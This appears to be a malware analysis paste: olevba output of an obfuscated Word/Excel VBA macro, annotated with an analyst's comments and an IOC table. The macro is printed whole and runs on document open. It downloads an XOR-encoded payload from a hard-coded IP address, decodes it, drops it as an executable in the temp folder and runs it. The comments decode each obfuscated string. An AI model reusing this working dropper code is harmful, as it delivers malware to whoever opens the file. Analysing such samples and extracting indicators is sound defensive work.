dynamoo

Malicious Word macro

Oct 27th, 2015
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V vbaProject.bin
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: vbaProject.bin
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Excel-style auto-exec name. It does nothing itself; every entry point in this
  ' module (AutoOpen for Word, Workbook_Open for Excel, and this one) ends up in the
  ' dropper routine naecHWEtHHtbM below.
  15. Sub Auto_Open()
  16. naecHWEtHHtbM
  17. End Sub
  18.  
  ' Repeating-key XOR decoder — the only "crypto" in the sample.
  '   hfgudrRChN : the encoded data, one character per byte (see pbAvnHvCOcZ)
  '   NmLpvABWZN : the key string; the key index wraps back to 1 once it passes Len(key)
  ' Returns the decoded string. Called once, from naecHWEtHHtbM, with the key "nkiOaWsg";
  ' re-applying the same XOR to the hosted bb.typ recovers the dropped executable offline.
  19. Function oUZDCYSBz(hfgudrRChN, NmLpvABWZN)
  20. Dim DlaQdYZnrwVM
  21. DlaQdYZnrwVM = ""   ' plaintext accumulator
  22. Dim qGVuetJ
  23. qGVuetJ = 2 - 1   ' key index; "2 - 1" is just an obfuscated 1
  24. Dim TiGjIdL
  25. TiGjIdL = 1
  26. For TiGjIdL = 1 To Len(hfgudrRChN)
  27. uXelSqetWAbrIT = Mid(NmLpvABWZN, qGVuetJ, 1)   ' current key character
  28. ZTpFUkV = Mid(hfgudrRChN, TiGjIdL, 1)   ' current data character
  29. DlaQdYZnrwVM = DlaQdYZnrwVM & Chr(Asc(ZTpFUkV) Xor Asc(uXelSqetWAbrIT))
  30. qGVuetJ = qGVuetJ + 1
  31. If Len(NmLpvABWZN) < qGVuetJ Then qGVuetJ = 1   ' cycle the key
  32. Next
  33.  
  34. oUZDCYSBz = DlaQdYZnrwVM
  35. End Function
  36.  
  ' Converts a raw byte array (the WinHttp responseBody) into a VBA string, one character
  ' per byte, walking it with LenB/MidB/AscB. The three-level accumulator (flushed every
  ' 300 bytes, and every 174 of those chunks) only changes how the pieces are joined — the
  ' result is the plain in-order concatenation of every byte. Presumably this is meant to
  ' keep string concatenation cheap on a large download; it has no effect on the output.
  ' The &H… arithmetic is obfuscation for small constants (worked out inline below).
  37. Function pbAvnHvCOcZ(zryqVCxyWrr)
  38. Dim ZPoIibDoJR, JbFyoPNFoRxR, OqzPlKr, XukMzXujgUSsPa, JfAoyNSuxGLcqPL, PXUgFeibPlGgI
  39. Dim ygaoXnJ
  40. ZPoIibDoJR = 1   ' byte position (1-based)
  41. JbFyoPNFoRxR = 2 - 1   ' chunk counter for the second-level buffer (= 1)
  42. OqzPlKr = 1   ' bytes appended to the first-level buffer so far
  43. ygaoXnJ = LenB(zryqVCxyWrr)   ' byte length, not character length
  44. Do While ZPoIibDoJR <= ygaoXnJ
  45. tbdWcuFNGrQl = Chr(AscB(MidB(zryqVCxyWrr, ZPoIibDoJR, 1)))   ' one byte -> one character
  46. PXUgFeibPlGgI = PXUgFeibPlGgI & tbdWcuFNGrQl
  47. ZPoIibDoJR = ZPoIibDoJR + 1
  48. OqzPlKr = OqzPlKr + 1
  49. BxvasUlR = 300
  50. If OqzPlKr > BxvasUlR Then   ' every 300 bytes: flush level 1 into level 2
  51. JfAoyNSuxGLcqPL = JfAoyNSuxGLcqPL & PXUgFeibPlGgI
  52. PXUgFeibPlGgI = ""
  53. OqzPlKr = (&H3EF + 2892 - &HF3A)   ' = 1007 + 2892 - 3898 = 1
  54. JbFyoPNFoRxR = JbFyoPNFoRxR + 1
  55. If JbFyoPNFoRxR > 19 + 31 * (&H20 + 1142 - &H491) Then   ' = 19 + 31 * 5 = 174 chunks: flush level 2 into level 3
  56. XukMzXujgUSsPa = XukMzXujgUSsPa & JfAoyNSuxGLcqPL
  57. JfAoyNSuxGLcqPL = ""
  58. JbFyoPNFoRxR = 1
  59. End If
  60. End If
  61. Loop
  62. pbAvnHvCOcZ = XukMzXujgUSsPa & JfAoyNSuxGLcqPL & PXUgFeibPlGgI   ' level 3 + level 2 + leftover, in order
  63. End Function
  64.  
  ' The dropper. Builds its COM ProgIDs and the download URL from split strings and a
  ' junk marker ("hcGpPQydpi") that is stripped with Replace, fetches an XOR-encoded payload
  ' over plain HTTP from a hard-coded IP, writes the decoded bytes to %TEMP%\diskdfrg503.exe
  ' and launches it. Decoded values are noted inline. There is no On Error handler anywhere
  ' in this routine, so any runtime error simply ends the macro; there is no integrity check
  ' on the download either. Host IOCs: the drop path and the three ProgIDs; network IOC:
  ' the URL on line 90.
  65. Sub naecHWEtHHtbM()
  66. Dim ltFbwRt As String
  67. LYMDaxRkb = ""   ' empty padding spliced into the ProgID below
  68. tLnHKfZPzbhEI = "r" + "i" + "p"   ' "rip"
  69. igWILjykMi = "hehcGpPQydpi" + "l" + "l"   ' "hell" once the marker is removed
  70. fsGnVrg = Replace(igWILjykMi, "hcGpPQydpi", "")
  71. HXNXvJiLqktuo = LYMDaxRkb + LYMDaxRkb + "WSc" + LYMDaxRkb + tLnHKfZPzbhEI + "t.S" + fsGnVrg + LYMDaxRkb   ' => "WScript.Shell"
  72. SxvWbDoY = "" + "" + ".exe"
  73. jthCBDaaJRDpv = "diskdfrg503" & SxvWbDoY   ' dropped file name: diskdfrg503.exe
  74. turiqEfvgMad = "Scripting.Fil" + "e" + "Sy" + "s"
  75. ZdLrJNCA = "e" + "c" + "t"
  76. vomJUBHkqH = "te" + "mO" + "b" + "j"
  77. dDNGqIfQPl = turiqEfvgMad + vomJUBHkqH + ZdLrJNCA   ' => "Scripting.FileSystemObject"
  78. Set eUMvBdooBUflklU = CreateObject(dDNGqIfQPl)   ' FileSystemObject
  79. UlNkpxXUjx = eUMvBdooBUflklU.GetSpecialFolder(2) & "\" + "\"   ' 2 = TemporaryFolder (%TEMP%); note the doubled backslash
  80. lzUiTQJPens = UlNkpxXUjx & jthCBDaaJRDpv   ' full drop path: %TEMP%\\diskdfrg503.exe
  81. ltFbwRt = (2 + 30 + 1142 - 1169)   ' = 5, stored as the string "5"
  82. LCNEmUMrVtZeK = "" + ".1"
  83. iwDokBl = "WinHt" + "t" + "p" + "."
  84. eYMbfyaRHJCv = iwDokBl + "WinHttp" + "Requ" + "est" + "." + ltFbwRt + LCNEmUMrVtZeK   ' => "WinHttp.WinHttpRequest.5.1"
  85. Set cnzZdwdShJh = CreateObject(eYMbfyaRHJCv, "")   ' second argument is the (empty) server name, i.e. local machine
  86.  
  87. zesOpyaWimNkqH = "hcGpPQydpihtthcGpPQydpip://"   ' "http://" after the marker is stripped
  88. XrTdGZXkSzDR = Replace(zesOpyaWimNkqH, "hcGpPQydpi", "")
  89.  
  90. DlaQdYZnrwVM = XrTdGZXkSzDR + "46.30.41" + ".150/" + "bb.ty" + "p"   ' payload URL: hxxp://46.30.41[.]150/bb.typ — plain HTTP, hard-coded IP (the IOC olevba flags)
  91.  
  92. ymgtVbmtxZ = "E" + "T"
  93. BfJmrmZbnp = "G"
  94. cnzZdwdShJh.Open "" + BfJmrmZbnp + ymgtVbmtxZ, DlaQdYZnrwVM, False   ' "GET", synchronous (third argument False)
  95. cnzZdwdShJh.send   ' blocks until the response is in; no On Error, so a failed request ends the macro here
  96. If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then   ' remove any earlier copy of the drop file first
  97. eUMvBdooBUflklU.DeleteFile (lzUiTQJPens)
  98. End If
  99. If cnzZdwdShJh.Status = 100 + 100 Then   ' only on HTTP 200
  100. xUmBoWIKxzpt = True   ' overwrite flag for CreateTextFile
  101. Set fEHnLYbclJADSdF = eUMvBdooBUflklU.CreateTextFile(lzUiTQJPens, xUmBoWIKxzpt)   ' NOTE(review): a text stream, not a binary one — worth confirming it round-trips all 256 byte values on the victim's code page
  102. YBlkuQGmcR = cnzZdwdShJh.responseBody   ' raw bytes of the download
  103. fEHnLYbclJADSdF.Write oUZDCYSBz(pbAvnHvCOcZ(YBlkuQGmcR), "nkiO" + "aWs" + "g")   ' bytes -> string, then XOR with the 8-char key "nkiOaWsg"; the hosted bb.typ is therefore encoded, not a bare executable
  104. fEHnLYbclJADSdF.Close
  105. End If
  106.    
  107. If eUMvBdooBUflklU.FileExists(lzUiTQJPens) Then   ' runs whatever is at the drop path now
  108. qBLjFDPZAWx = lzUiTQJPens
  109. CreateObject(HXNXvJiLqktuo).Run qBLjFDPZAWx   ' WScript.Shell.Run <path>, no window-style or wait arguments
  110. End If
  111. End Sub
  112.  
  ' Word auto-exec entry point — the one that actually fires when this document is opened.
  ' The two assignments to LxuuCbj are dead code: both produce "WOW Nuke" and the value is
  ' never read in this routine. The real work is the call through to Auto_Open.
  113. Sub AutoOpen()
  114. LxuuCbj = "WOW " + "N" + "u" + "k" + "e"
  115. LxuuCbj = "WOW" + " Nuk" + "e"   ' same text as the line above
  116.     Auto_Open
  117. End Sub
  ' Excel auto-exec entry point; present so the same module also fires if the macro is
  ' embedded in a workbook. Routes to Auto_Open like the others.
  118. Sub Workbook_Open()
  119.     Auto_Open
  120. End Sub
  121. +------------+----------------------+-----------------------------------------+
  122. | Type       | Keyword              | Description                             |
  123. +------------+----------------------+-----------------------------------------+
  124. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  125. | AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
  126. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  127. | Suspicious | Open                 | May open a file                         |
  128. | Suspicious | Run                  | May run an executable file or a system  |
  129. |            |                      | command                                 |
  130. | Suspicious | CreateObject         | May create an OLE object                |
  131. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  132. |            |                      | strings                                 |
  133. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  134. |            |                      | strings                                 |
  135. | Suspicious | CreateTextFile       | May create a text file                  |
  136. | Suspicious | Write                | May write to a file (if combined with   |
  137. |            |                      | Open)                                   |
  138. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  139. |            |                      | may be used to obfuscate strings        |
  140. |            |                      | (option --decode to see all)            |
  141. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  142. |            | Strings              | may be used to obfuscate strings        |
  143. |            |                      | (option --decode to see all)            |
  144. | IOC        | 46.30.41.150         | IPv4 address (obfuscation: VBA          |
  145. |            |                      | expression)                             |
  146. +------------+----------------------+-----------------------------------------+